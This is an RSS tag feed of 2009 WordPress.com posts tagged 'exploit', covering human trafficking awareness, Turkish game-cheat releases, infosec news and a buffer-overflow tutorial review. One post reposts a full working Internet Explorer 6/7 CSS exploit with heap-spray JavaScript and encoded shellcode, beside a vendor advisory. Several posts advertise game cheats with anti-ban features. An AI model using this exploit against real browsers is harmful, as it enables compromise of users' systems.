<?xml version="1.0" encoding="UTF-8"?><!-- generator="wordpress.com" -->
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	>

<channel>
	<title>exploit &amp;laquo; WordPress.com Tag Feed</title>
	<link>http://en.wordpress.com/tag/exploit/</link>
	<description>Feed of posts on WordPress.com tagged "exploit"</description>
	<pubDate>Thu, 26 Nov 2009 08:18:11 +0000</pubDate>

	<generator>http://en.wordpress.com/tags/</generator>
	<language>en</language>

<item>
<title><![CDATA[Facing the realities of human trafficking in our own back yard ]]></title>
<link>http://cjaye57.wordpress.com/2009/11/24/facing-the-realities-of-human-trafficking-in-our-own-back-yard/</link>
<pubDate>Tue, 24 Nov 2009 12:40:08 +0000</pubDate>
<dc:creator>cjaye57</dc:creator>
<guid>http://cjaye57.wordpress.com/2009/11/24/facing-the-realities-of-human-trafficking-in-our-own-back-yard/</guid>
<description><![CDATA[Shaniya Davis I recently published a story on the Foreign Policy Association Blog Network, Trafficki]]></description>
<content:encoded><![CDATA[<div class='snap_preview'><p><a href="http://cjaye57.wordpress.com/files/2009/11/20091120-tows-shaniya-davis-1-290x218.jpg"><img src="http://cjaye57.wordpress.com/files/2009/11/20091120-tows-shaniya-davis-1-290x218.jpg" alt="" title="20091120-tows-shaniya-davis-1-290x218" width="290" height="218" class="aligncenter size-full wp-image-2180" /></a>Shaniya Davis</p>
<p>I recently published a story on the Foreign Policy Association Blog Network, Trafficking? Not in my town…Yes, in every town, which featured the story of 5 year-old, Shaniya Davis, from Fayetteville, North Carolina.  Shaniya was reportedly kidnapped and her body was later found on the side of a rural highway in North Carolina.  Her mother was later charged with human trafficking for placing her daughter into ’sexual servitude’.</p>
<p>The story lead me an interview with Blog Talk Radio&#8217;s DC based show, “A Measure Of Truth”.  I sat down with host, Michael Fordham to discuss some of the harsh realities of human trafficking/modern slavery and how it can effect every town, and we can all make an impact in helping to bring awareness to, and an end to, this horrendous crime against humanity. Click here for the recorded pod cast. </p>
<p>The case in NC has led many to seek to ask tough questions on whether this tragedy could have been prevented, however while the general issue of abuse has been addressed, few have touched on the realities of human trafficking. Out side of the human trafficking field few have questioned or mentioned the demand for sex, sex with a child, that factored into this story, which is haunting reality for many children across the globe. The demand for children that exists in Fayetteville, NC or, Washington, DC is the same demand that fuels sexual slavery in India, Thailand and beyond. This brings me back to an older article I published, Are we still clueless about modern slavery?.  The hard truth is overall, yes!  However we are progressing, we do have a long way to go.  First steps are to educate yourself on what human trafficking is, then make yourself aware of the signs and how to report any suspected cases or potential victims.</p>
<p>What is Human Trafficking, or Modern Slavery? It is when the use of fraud, force, or coercion is used in which to exploit an individual for the mere means of profit or economic gains. There is no stereotypical face of human trafficking, for the chains of modern slavery can bind anyone, of any gender, race, religion or age. Those bound by slavery do not have to cross borders to be victimized, for one can be exploited within their own home, community, as well as half across the globe. Modern slavery comes in many shapes and forms, such as; child soldiers, forced labor through debt bondage, and forced prostitution or sex slavery. And as we have seen, not even rural North Carolina is immune to this disease of power and greed, which binds some 27 million people around the world.</p>
<p>It does happen right her in our nations capital, and not rarely.  The Federal Bureau of Investigation (FBI) considers Washington, DC one of the top 14 sites in the country for sex trafficking of American children. (FBI, 2005).  According to the Department of Justice (DOJ) Task Force members maintain that hundreds of sex and labor trafficking cases in the Washington, DC area remain undiscovered each year.</p>
<p>Anyone can become a victim; there isn’t one face to human trafficking and modern slavery. How do you know if you have come across a victim?  The following is a list of potential red flags and indicators of human trafficking.  If you see any of the following red flags, call the National Human Trafficking Resource Center hotline at 1-888-3737-888 now to report the situation.</p>
<p>• Is unpaid, paid very little, or paid only through tips</p>
<p>• Is not free to leave, or come and go</p>
<p>• Works excessively long and/or unusual hours , has no breaks or unusual restrictions at work</p>
<p>• Owes a large debt and is unable to pay it off</p>
<p>• Is under 18 and is providing commercial sex acts</p>
<p>• Was recruited through false promises concerning the nature and conditions of his/her work</p>
<p>• Is fearful, anxious, depressed, submissive, tense, or nervous / paranoid behavior</p>
<p>• Exhibits unusually fearful or anxious behavior after bringing up “law enforcement”</p>
<p>• Avoids eye contact</p>
<p> • Appears malnourished or is in poor physical health</p>
<p>• Shows signs of physical and/or sexual abuse</p>
<p>• Has little to no personal possessions</p>
<p>• Is not in control of his/her own money, no financial records, or bank account</p>
<p>• Has numerous inconsistencies in  their story</p>
<p>Note: This list is not exhaustive and rather represents a selection of possible indicators and may not be present in all trafficking cases.  Please see www.slaverystillexists.org for a more conclusive list</p>
<p>source: http://www.examiner.com/x-7661-DC-Human-Rights-Examiner~y2009m11d24-Facing-the-realities-of-human-trafficking-in-our-own-back-yard</p>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Worm Hits Facebook Walls]]></title>
<link>http://komplettie.wordpress.com/2009/11/24/worm-hits-facebook-walls/</link>
<pubDate>Tue, 24 Nov 2009 11:00:06 +0000</pubDate>
<dc:creator>komplettie</dc:creator>
<guid>http://komplettie.wordpress.com/2009/11/24/worm-hits-facebook-walls/</guid>
<description><![CDATA[Thanks to the fact that it stores so much of users’ personal data, Facebook has long been the source]]></description>
<content:encoded><![CDATA[Thanks to the fact that it stores so much of users’ personal data, Facebook has long been the source]]></content:encoded>
</item>
<item>
<title><![CDATA[ClamWin Free Antivirus 0.95.3 Released]]></title>
<link>http://secarikehidupan.wordpress.com/2009/11/24/clamwin-free-antivirus-0-95-3-released/</link>
<pubDate>Tue, 24 Nov 2009 07:51:19 +0000</pubDate>
<dc:creator>secarikehidupan</dc:creator>
<guid>http://secarikehidupan.wordpress.com/2009/11/24/clamwin-free-antivirus-0-95-3-released/</guid>
<description><![CDATA[Telah dirilis versi terbaru Antivirus Clamav versi Windows (Clamwin) 0.95.3 semenjak 11 Nopember 200]]></description>
<content:encoded><![CDATA[Telah dirilis versi terbaru Antivirus Clamav versi Windows (Clamwin) 0.95.3 semenjak 11 Nopember 200]]></content:encoded>
</item>
<item>
<title><![CDATA[OWASP Top 10 - 2010 RC1]]></title>
<link>http://mithandir.wordpress.com/2009/11/23/owasp-top-10-2010-rc1/</link>
<pubDate>Mon, 23 Nov 2009 20:12:32 +0000</pubDate>
<dc:creator>mithandir</dc:creator>
<guid>http://mithandir.wordpress.com/2009/11/23/owasp-top-10-2010-rc1/</guid>
<description><![CDATA[A first release candidate for the OWASP Top 10 2010 was released a while ago. In my view the best en]]></description>
<content:encoded><![CDATA[<div class='snap_preview'><p>A first release candidate for the <a href="http://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project">OWASP Top 10 2010</a> was released a while ago. In my view the best enhancement is the new design of document.</p>
<p>As I worked on some short executive summaries for my company, I always struggled how to get a lot of information in the shortest form possible. The new OWASP Top10 PDF design is kind of perfect for this matter.</p>
<p><strong>Document</strong> (<a title="OWASP Top 10 2010 RC1 PDF Download" href="http://www.owasp.org/images/0/0f/OWASP_T10_-_2010_rc1.pdf">Download</a> as PDF):</p>
<p><strong><span style="font-weight:normal;"><!-- SlideShare error: doc is missing or has illegal characters /[^-_a-zA-Z0-9]/ --></span></strong></p>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[İlahi Ekşi Sözlük ]]></title>
<link>http://furkhan.wordpress.com/2009/11/23/ilahi-eksi-sozluk/</link>
<pubDate>Mon, 23 Nov 2009 10:31:09 +0000</pubDate>
<dc:creator>furkhan</dc:creator>
<guid>http://furkhan.wordpress.com/2009/11/23/ilahi-eksi-sozluk/</guid>
<description><![CDATA[Gene günlerden PAZARTESİ sıkıcı bir ders havası var okulumda her zaman kii gibi ekiyorum eve geliyor]]></description>
<content:encoded><![CDATA[<div class='snap_preview'><p style="text-align:center;">
<p style="text-align:left;"><img src="http://beerserk.files.wordpress.com/2008/12/eksi-sozluk.jpg" alt="ekşi sözlük , site güvenliği" /></p>
<p>Gene günlerden PAZARTESİ sıkıcı bir ders havası var okulumda her zaman kii gibi ekiyorum eve geliyorum .. Ne yapsam ne etsem diye düşünürken bir film izliyeyim dedim netten 2o12&#8242; yi buldum dolmasını beklıyorum .  Yazmışım googleme ekşi sözlük diye girmişim ekşi sözlüğüme cirit atıyorum resmen sitede . Gözüme &#8221; <a title="fbi ve cia ajanlarına kerhanede yumurtalı saldırı (2/2)" href="http://sozluk.sourtimes.org/show.asp?t=fbi+ve+cia+ajanlar%C4%B1na+kerhanede+yumurtal%C4%B1+sald%C4%B1r%C4%B1" target="sozmain">fbi ve cia ajanlarına kerhanede yumurtalı saldırı</a> &#8221; diye bişiy çarptı açtım meraklan okuyorum kii okuduğumun sonuna gelene kadar ağzım kulaklarıma vardı .. (: Sizlede paylaşmak istedim ..</p>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Exploit Baru Serang IE6 dan IE7]]></title>
<link>http://tech19.wordpress.com/2009/11/22/exploit-baru-serang-ie6-dan-ie7/</link>
<pubDate>Sun, 22 Nov 2009 23:32:31 +0000</pubDate>
<dc:creator>uniqueopini</dc:creator>
<guid>http://tech19.wordpress.com/2009/11/22/exploit-baru-serang-ie6-dan-ie7/</guid>
<description><![CDATA[Bagi reman-reman (rekan/teman) yang aktif menggunakan Window dan Internet Explorer 6/7, berita baru ]]></description>
<content:encoded><![CDATA[Bagi reman-reman (rekan/teman) yang aktif menggunakan Window dan Internet Explorer 6/7, berita baru ]]></content:encoded>
</item>
<item>
<title><![CDATA[Microsoft Internet Explorer CSS Handling Code Execution Vulnerability (0day)]]></title>
<link>http://tweetycoaster.wordpress.com/2009/11/22/microsoft-internet-explorer-css-handling-code-execution-vulnerability-0day/</link>
<pubDate>Sun, 22 Nov 2009 09:54:35 +0000</pubDate>
<dc:creator>tweetycoaster</dc:creator>
<guid>http://tweetycoaster.wordpress.com/2009/11/22/microsoft-internet-explorer-css-handling-code-execution-vulnerability-0day/</guid>
<description><![CDATA[A vulnerability has been identified in Microsoft Internet Explorer, which could be exploited by atta]]></description>
<content:encoded><![CDATA[<div class='snap_preview'><p>A vulnerability has been identified in Microsoft Internet Explorer, which could be exploited by attackers to compromise a vulnerable system. This issue is caused by a dangling pointer in the Microsoft HTML Viewer (mshtml.dll) when retrieving certain CSS/STYLE objects via the &#8220;getElementsByTagName()&#8221; method, which could allow attackers to crash an affected browser or execute arbitrary code by tricking a user into visiting a malicious web page.</p>
<p>VUPEN has confirmed the vulnerability on fully patched Windows XP SP3 systems with Internet Explorer 7 and 6.</p>
<p><em><strong>Affected Products</strong></em></p>
<p>Microsoft Internet Explorer 7<br />
Microsoft Internet Explorer 6</p>
<p><em><strong>Solution</strong></em></p>
<p>Disable Active Scripting in the Internet and Local intranet security zones.</p>
<p>VUPEN Security is not aware of any vendor-supplied patch.</p>
<p><em><strong>References</strong></em></p>
<p><a href="http://www.vupen.com/english/advisories/2009/3301" target="_blank">http://www.vupen.com/english/advisories/2009/3301</a></p>
<p>exploit code</p>
<blockquote><p>&#38;lt;!&#8211;<br />
securitylab.ir<br />
K4mr4n_st@yahoo.com<br />
&#8211;&#38;gt;<br />
&#38;lt;!DOCTYPE HTML PUBLIC &#38;quot;-//W3C//DTD XHTML 1.0 Transitional//EN&#38;quot; &#38;quot;http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd&#38;quot;&#38;gt;<br />
&#38;lt;HTML xmlns=&#38;quot;http://www.w3.org/1999/xhtml&#38;quot;&#38;gt;<br />
&#38;lt;HEAD&#38;gt;<br />
&#38;lt;script&#38;gt;<br />
function load(){<br />
var e;<br />
e=document.getElementsByTagName(&#38;quot;STYLE&#38;quot;)[0];<br />
e.outerHTML=&#38;quot;1&#38;quot;;<br />
}<br />
&#38;lt;/script&#38;gt;<br />
&#38;lt;STYLE type=&#38;quot;text/css&#38;quot;&#38;gt;<br />
body{ overflow: scroll; margin: 0; }<br />
&#38;lt;/style&#38;gt;</p>
<p>&#38;lt;SCRIPT language=&#38;quot;javascript&#38;quot;&#38;gt;<br />
var shellcode = unescape(&#38;quot;%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%u7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u0063&#38;quot;);<br />
var bigblock = unescape(&#38;quot;%u9090%u9090&#38;quot;);<br />
var headersize = 20;<br />
var slackspace = headersize+shellcode.length;<br />
while (bigblock.length&#38;lt;slackspace) bigblock+=bigblock;<br />
fillblock = bigblock.substring(0, slackspace);<br />
block = bigblock.substring(0, bigblock.length-slackspace);<br />
while(block.length+slackspace&#38;lt;0&#215;40000) block = block+block+fillblock;<br />
memory = new Array();<br />
for (x=0; x&#38;lt;4000; x++) memory[x] = block + shellcode;<br />
&#38;lt;/script&#38;gt;</p>
<p>&#38;lt;/HEAD&#38;gt;<br />
&#38;lt;BODY onload=&#38;quot;load()&#38;quot;&#38;gt;<br />
&#38;lt;/BODY&#38;gt;<br />
&#38;lt;/HTML&#38;gt;</p>
<p>&#160;</p>
</blockquote>
<p>exploit source : <a href="http://downloads.securityfocus.com/vulnerabilities/exploits/37085.html" target="_blank">http://downloads.securityfocus.com/vulnerabilities/exploits/37085.html</a></p>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Serdem Coşkun - Alçak]]></title>
<link>http://furkhan.wordpress.com/2009/11/20/serdem-coskun-alcak/</link>
<pubDate>Fri, 20 Nov 2009 21:28:34 +0000</pubDate>
<dc:creator>furkhan</dc:creator>
<guid>http://furkhan.wordpress.com/2009/11/20/serdem-coskun-alcak/</guid>
<description><![CDATA[Dün youtube&#8217;de dolaşırken rastladığım müthiş bir şarkı . Dinlemenizi şiddetle tavsiye ederim .]]></description>
<content:encoded><![CDATA[<div class='snap_preview'><p><strong>Dün youtube&#8217;de dolaşırken rastladığım müthiş bir şarkı . Dinlemenizi şiddetle tavsiye ederim .. <a href="http://www.youtube.com/watch?v=fn3sDAg-e00" target="_blank">Serdem Coşkun &#8211; Alçak</a><br />
</strong></p>
<p><strong>Youtubeye giremeyenler için www.ktunnel.com adresinden bağlana bilirler ..</strong></p>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[ FearKoxp v6 1753 [Classic Skin]]]></title>
<link>http://furkhan.wordpress.com/2009/11/20/fearkoxp-v6-1753-classic-skin/</link>
<pubDate>Fri, 20 Nov 2009 17:06:24 +0000</pubDate>
<dc:creator>furkhan</dc:creator>
<guid>http://furkhan.wordpress.com/2009/11/20/fearkoxp-v6-1753-classic-skin/</guid>
<description><![CDATA[Tamamen türk yapımı koxpdur. Özelliklerine Gelirsek: Türkçe: Version 1753 Hakkında: |* Versiyon 1753]]></description>
<content:encoded><![CDATA[<div class='snap_preview'><div>
<p><img src="http://i0911.hizliresim.com/2009/11/5/3134.png" border="0" alt="" /></p>
<ul>
<li>Tamamen türk yapımı koxpdur.</li>
<li>Özelliklerine Gelirsek:</li>
</ul>
<p>Türkçe:<br />
<strong>Version 1753 Hakkında:</strong><br />
&#124;* Versiyon 1753<br />
&#124;* Anti TPT eklidir.<br />
&#124;* Tasarım Hasif sadedir.<br />
&#124;* Hatalar tamamen fixed.<br />
&#124;* 50 Seviye görevi (7 Anahtar Görevi) Kaldırıldı<br />
&#124;* Otomatik pot Fix.<br />
&#124;* HP Sistemi Full Fix.<br />
&#124;* Otomatik TS Eklenmiştir.<br />
&#124;* %10 Attack – %60 Def. vb. Eklenmiştir.<br />
&#124;* Hedef Takibi Eklenecektir.<br />
&#124;* Skill ID İle Attack yaptırma çalışmaları başlanmıştır.<br />
&#124;* Auto Ban Sorununu Çözük Sanıyorum 1.5 Saattir Vermedi…<br />
&#124;* Koxp Türkçeleştirildi. Yakında [Turkish - English - Spain]<br />
&#124;* Herkeze Teşekkür Ederim</p>
<p>Yapımcı &#38; Tasarımcı: eStyTech<br />
Yardımları Için Tangy Kardeşime Çok Teşekkür Ederim…</p>
<p>English:<br />
<strong>Version 1753 About<strong></strong>: </strong><br />
&#124; * Version 1753<br />
&#124; * Anti TPT is attached.<br />
&#124; * Design Hasif are plain.<br />
&#124; * Errors completely fixed.<br />
&#124; * 50 level task (7 Key Task) Removed<br />
&#124; * Auto pot Fix.<br />
&#124; * HP System Full Fix.<br />
&#124; * Automatic TS Added.<br />
&#124; *% 10 Attack – 60% Def. vb. Added.<br />
&#124; * Target Tracking will be added.<br />
&#124; * Skill has begun work to do Attack with ID.<br />
&#124; * Auto Ban Issue I think the solution is 1.5 hours not Give …<br />
&#124; * Koxp Turkish. Soon [Turkish - Türkçe - Spain]<br />
&#124; * Herkeze Thank you</p>
<p>Producer &#38; Designer: eStyTech<br />
Very Thank you for helping my brother Tangy …</p>
</div>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Alcazer KOXP v4.5 [1753]]]></title>
<link>http://furkhan.wordpress.com/2009/11/20/alcazer-koxp-v4-5-1753/</link>
<pubDate>Fri, 20 Nov 2009 17:02:58 +0000</pubDate>
<dc:creator>furkhan</dc:creator>
<guid>http://furkhan.wordpress.com/2009/11/20/alcazer-koxp-v4-5-1753/</guid>
<description><![CDATA[Hızlı Saldırı: | * CS beceri süre =&gt; 1.350 | * Ok beceri süre =&gt; 2.200 duş | * MultipleShot be]]></description>
<content:encoded><![CDATA[<div class='snap_preview'><div>
<p><img src="http://img199.imageshack.us/img199/7245/alcazer.jpg" border="0" alt="" /></p>
<p><strong>Hızlı Saldırı: </strong><br />
<strong>&#124; * CS beceri süre =&#62; 1.350 </strong><br />
<strong>&#124; * Ok beceri süre =&#62; 2.200 duş </strong><br />
<strong>&#124; * MultipleShot beceri süre =&#62; 1.250 </strong></p>
<p><strong>Hotkeys ve araçlar () sadece ko ekran çalışmaktadır: </strong><br />
<strong>&#124; * F11 =&#62; Taarruz / Durdur </strong><br />
<strong>&#124; * ÜSTKRKT&#62; AoE Beceri Cordinate fare Yer al = </strong><br />
<strong>&#124; * CTRL + Sol Tıklama =&#62; Duvar Hack </strong><br />
<strong>&#124; * CTRL + Numpad 8 =&#62; X Cordinate – 0,25 </strong><br />
<strong>&#124; * CTRL + Numpad 2 =&#62; X Cordinate + 0,25 </strong><br />
<strong>&#124; * CTRL + Numpad 4 =&#62; Y Cordinate – 0,25 </strong><br />
<strong>&#124; * CTRL + Numpad 6 =&#62; Y Cordinate + 0,25 </strong></p>
<p><strong>Bunun için: </strong><br />
<strong>&#124; Siz bir parti bulunmaktadır * Açık Seek </strong><br />
<strong>&#124; * Hedef Bilgi sabitlenir [TPT vermek] </strong><br />
<strong>&#124; * Oto yağma sabit olacaktır [TPT vermek] </strong><br />
<strong>&#124; * Geliştirilmiş gram kontrol sabit olacaktır [TPT vermek] </strong><br />
<strong>&#124; * Sohbet logger sabit olacaktır [TPT vermek] </strong><br />
<strong>&#124; * Oto parti iyileştirilecek</strong></p>
<p><strong>Download: Yakında..</p>
<p></strong></p>
<p><img src="http://i45.tinypic.com/245bi8n.jpg" alt="furkhan" width="442" height="107" /></p>
</div>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[ Fuckoxp 1753 v2 [First Experience]]]></title>
<link>http://furkhan.wordpress.com/2009/11/20/fuckoxp-1753-v2-first-experience/</link>
<pubDate>Fri, 20 Nov 2009 16:59:38 +0000</pubDate>
<dc:creator>furkhan</dc:creator>
<guid>http://furkhan.wordpress.com/2009/11/20/fuckoxp-1753-v2-first-experience/</guid>
<description><![CDATA[Tamamen türk yapımı koxpdur. Özelliklerine Gelirsek: Türkçe: Version 1753 Hakkında: |* Versiyon 1753]]></description>
<content:encoded><![CDATA[<div class='snap_preview'><div>
<p><img src="http://img696.imageshack.us/img696/1773/fearkoxp.png" border="0" alt="" width="473" height="291" /></p>
<ul>
<li>Tamamen türk yapımı koxpdur.</li>
<li>Özelliklerine Gelirsek:</li>
</ul>
<p>Türkçe:<br />
<strong>Version 1753 Hakkında:</strong><br />
&#124;* Versiyon 1753<br />
&#124;* Anti TPT eklidir.<br />
&#124;* Tasarım Hasif sadedir.<br />
&#124;* Hatalar tamamen fixed.<br />
&#124;* 50 Seviye görevi (7 Anahtar Görevi) Kaldırıldı<br />
&#124;* Otomatik pot Fix.<br />
&#124;* HP Sistemi Full Fix.<br />
&#124;* Otomatik TS Eklenmiştir.<br />
&#124;* %10 Attack – %60 Def. vb. Eklenmiştir.<br />
&#124;* Hedef Takibi Eklenecektir.<br />
&#124;* Skill ID İle Attack yaptırma çalışmaları başlanmıştır.<br />
&#124;* Auto Ban Sorununu Çözük Sanıyorum 1.5 Saattir Vermedi…<br />
&#124;* Koxp Türkçeleştirildi. Yakında [Turkish - English - Spain]<br />
&#124;* Herkeze Teşekkür Ederim</p>
<p>Yapımcı &#38; Tasarımcı: eStyTech<br />
Yardımları Için Tangy Kardeşime Çok Teşekkür Ederim…</p>
<p>English:<br />
<strong>Version 1753 About<strong></strong>: </strong><br />
&#124; * Version 1753<br />
&#124; * Anti TPT is attached.<br />
&#124; * Design Hasif are plain.<br />
&#124; * Errors completely fixed.<br />
&#124; * 50 level task (7 Key Task) Removed<br />
&#124; * Auto pot Fix.<br />
&#124; * HP System Full Fix.<br />
&#124; * Automatic TS Added.<br />
&#124; *% 10 Attack – 60% Def. vb. Added.<br />
&#124; * Target Tracking will be added.<br />
&#124; * Skill has begun work to do Attack with ID.<br />
&#124; * Auto Ban Issue I think the solution is 1.5 hours not Give …<br />
&#124; * Koxp Turkish. Soon [Turkish - Türkçe - Spain]<br />
&#124; * Herkeze Thank you</p>
<p><img src="http://i45.tinypic.com/245bi8n.jpg" alt="furkhan" width="442" height="107" /></p>
</div>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Ben Sana Bok Demem]]></title>
<link>http://furkhan.wordpress.com/2009/11/20/ben-sana-bok-demem/</link>
<pubDate>Fri, 20 Nov 2009 16:38:04 +0000</pubDate>
<dc:creator>furkhan</dc:creator>
<guid>http://furkhan.wordpress.com/2009/11/20/ben-sana-bok-demem/</guid>
<description><![CDATA[Ben sana bok demem, Boklar duyar ar eder. Bir zerren düşse boka, Onu da mundar eder. Tanrı senin ham]]></description>
<content:encoded><![CDATA[<div class='snap_preview'><p>Ben sana bok demem,</p>
<p>Boklar duyar ar eder.</p>
<p>Bir zerren düşse boka,</p>
<p>Onu da mundar eder.</p>
<p>Tanrı senin hamurunu</p>
<p>Necasetle yoğurmuş,</p>
<p>Anan seni s.ç.r iken</p>
<p>Yanlışlıkla doğurmuş.</p>
<p>Neyzen Tevfik</p>
<p><img src="http://i45.tinypic.com/245bi8n.jpg" alt="furkhan" width="442" height="107" /></p>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Otomatik Port Açma / Her Modemde Port Aça ]]></title>
<link>http://furkhan.wordpress.com/2009/11/20/otomatik-port-acma-her-modemde-port-aca/</link>
<pubDate>Fri, 20 Nov 2009 14:27:38 +0000</pubDate>
<dc:creator>furkhan</dc:creator>
<guid>http://furkhan.wordpress.com/2009/11/20/otomatik-port-acma-her-modemde-port-aca/</guid>
<description><![CDATA[Size önereceğim bu program ile ki adı PFConfig modeminizin ayarlarını modem imalatçısı kadar bilmeni]]></description>
<content:encoded><![CDATA[<div class='snap_preview'><p>Size önereceğim bu program ile ki adı PFConfig modeminizin ayarlarını modem imalatçısı kadar bilmenize gerek kalmayacak, bu program sayesinde modeminiz ne olursa olsun istediğiniz program için istediğiniz portu açabileceksiniz.</p>
<p>Programın nasıl kullanıcılacağı ve download linki verdiğim sayfada bulunmakta. Programı kuruyorsunuz, ilk başta size iki soru soracak bunlardan birisi aşağıdaki şekilde gördüğünüz gibi modeminizin marka ve modeli.</p>
<p><img src="http://img337.imageshack.us/img337/4224/16492058ed1.png" border="0" alt="" /></p>
<p><strong>İkinci olarak program modem ayarlarınıza ulaşmak için sizden modem ayar sayfasının ip numarasını[Genellikle &#124;192.168.2.1&#124; Ama Sizde Farklı Olabilir...], şifre ve kullanıcı adınızı isteyecek aşağıdaki şekildeki gibi.</strong></p>
<p>Bunları yapmanızla birlikte artık modemde istediğiniz program için istediğiniz portu açabilirsiniz. Tek yapmanız gereken program listesinden mesela utorrenti seçmek ve forward this app seçeneğiniz seçmek. Artık modeminizde o program için port açmış durumdasınız.</p>
<p><a href="http://www.portforward.com/store/PFCSetup1.0.149.exe" target="_blank">İndirmek için tıkla </a></p>
<p><img src="http://i45.tinypic.com/245bi8n.jpg" alt="furkhan" width="442" height="107" /></p>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[T-Mobile staff sold personal data ]]></title>
<link>http://inforisk.wordpress.com/2009/11/18/t-mobile-staff-sold-personal-data/</link>
<pubDate>Wed, 18 Nov 2009 09:44:06 +0000</pubDate>
<dc:creator>inforisk</dc:creator>
<guid>http://inforisk.wordpress.com/2009/11/18/t-mobile-staff-sold-personal-data/</guid>
<description><![CDATA[Staff at mobile phone company T-Mobile passed on millions of records from thousands of customers to ]]></description>
<content:encoded><![CDATA[Staff at mobile phone company T-Mobile passed on millions of records from thousands of customers to ]]></content:encoded>
</item>
<item>
<title><![CDATA[Rise of explo.it database]]></title>
<link>http://infosanity.wordpress.com/2009/11/17/explo-it-database/</link>
<pubDate>Tue, 17 Nov 2009 19:02:28 +0000</pubDate>
<dc:creator>Andrew Waite</dc:creator>
<guid>http://infosanity.wordpress.com/2009/11/17/explo-it-database/</guid>
<description><![CDATA[The team from Offensive Security have just announced the opening of explo.it (re-directs to exploits]]></description>
<content:encoded><![CDATA[<div class='snap_preview'><p>The team from <a title="Offensive Security" href="http://www.offensive-security.com/">Offensive Security</a> have just announced the opening of <a title="Explo.it" href="http://explo.it">explo.it</a> (re-directs to <a title="exploits.offensive-security.com" href="http://exploits.offensive-security.com">exploits.offensive-security.com</a>, just more memorable). The site is designed as a successor to <a title="milw0rm" href="http://milw0rm.com">milw0rm</a>. If you&#8217;ve ever browsed the milw0rm site the layout will be instantly familiar.</p>
<p>I think this is great news for the infosec community, not only does the OffSec team always produce high quality output, but it helps provide some stability in the wake of milw0rms <a href="http://infosanity.wordpress.com/2009/07/08/good-night-milw0rm/">recent</a> <a title="Str0ke hoax" href="http://infosanity.wordpress.com/2009/11/04/sad-news-rip-str0ke/">uncertainty.</a></p>
<p>At this point the site&#8217;s content volume is growing rapidly, when I looked this morning the archives exploits numbered around 9000, already it has reach 10000+, and a refresh of the front page has this number increase a good percentage of the time.</p>
<p>One feature of the site that I do like is a link (where available) to the vulnerable version of the application or code. I believe this will make testing much easier as it removes the need to trawl the web for an often unsupported and unavailable old version of an application. I really hope that this feature will become popular and all/most of the published exploits will link to a download location for retrieving the vulnerable code where possible.</p>
<p>Happy exploiting (in your lab, obviously)</p>
<p>&#8211; <a title="Bio - Andrew Waite" href="http://infosanity.wordpress.com/about/bio-andrew-waite/">Andrew Waite</a></p>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Buffer overflow primer review]]></title>
<link>http://raykoid666.wordpress.com/2009/11/17/buffer-overflow-primer-review/</link>
<pubDate>Tue, 17 Nov 2009 10:07:26 +0000</pubDate>
<dc:creator>raykoid666</dc:creator>
<guid>http://raykoid666.wordpress.com/2009/11/17/buffer-overflow-primer-review/</guid>
<description><![CDATA[Hello all, after a while of not updating my blog, and switching blogs, I decided to finally make a n]]></description>
<content:encoded><![CDATA[<div class='snap_preview'><p>Hello all, after a while of not updating my blog, and switching blogs, I decided to finally make a new post after all.</p>
<p>This post will be a review on the video tutorial series &#8220;Buffer overflow primer&#8221; by <a href="http://www.vivekramachandran.com/" target="_blank">Vivek Ramachandran</a>.</p>
<blockquote><p><em><a href="http://www.vivekramachandran.com/" target="_blank">Vivek Ramachandran</a> is a security evangelist and has been working in computer security related fields for the past 7 years. In 2007, Vivek spoke at world renowned conferences <a href="http://defcon.org">Defcon (WEP Cloaking Exposed)</a> and <a href="http://toorcon.org" target="_blank">Toorcon (The Caffe Latte Attack)</a>. The discovery of the Caffe Latte Attack was covered by CBS5 news, BBC online, Network World etc news agencies.In 2006, Vivek was announced as one of winners of the Microsoft Security Shootout contest held in India among 65,000 participants. He has also been a recipient of a Team Achievement at <a href="http://www.cisco.com">Cisco Systems</a> for his work on 802.1x and Port Security modules on the Catalyst 6500 switches. Currently he spends all of his time maintaining <a href="http://www.security-freak.net" target="_blank">Security- Freak.Net</a> , <a href="http://www.securitytube.net">SecurityTube.Net</a> and is the co-founder of <a href="http://www.axonize.com">Axonize</a>. Vivek, is a Bachelor in Electronics and Communications Engineering from the prestigious <a href="http://www.iitg.ernet.in" target="_blank">Indian Institute of Technology, Guwahati.</a>You can contact him at vivek[at]securitytube.net</em></p></blockquote>
<p>So, to start off the review with a short description:</p>
<p>The Buffer Overflow Primer Series are a series of 9 video tutorials about buffer overflow. The author will take you through various slideshows and practical examples, including the code and a fully detailed explanation about what each function does.</p>
<p>Some things included in these tutorials are:</p>
<ul>
<li>analyzing the stack</li>
<li>exploiting the stack</li>
<li>converting complex c code to a simple assembly code</li>
<li>creating shellcode from this assembly code</li>
<li>using this shellcode to exploit a program</li>
</ul>
<p>In other words, in just these 9 video tutorials, you will learn a lot. Even if you have no idea what buffer overflow is, the author explains everything step by step in the greatest detail I have ever seen.</p>
<p>The links to the different parts:</p>
<p><a href="http://go.clb1.com/a6ea0qv0dh4">Part 1</a> (Smashing the stack)<br />
<a href="http://go.clb1.com/a7ea0qv6j6n">Part 2</a> (Writing exit shellcode)<br />
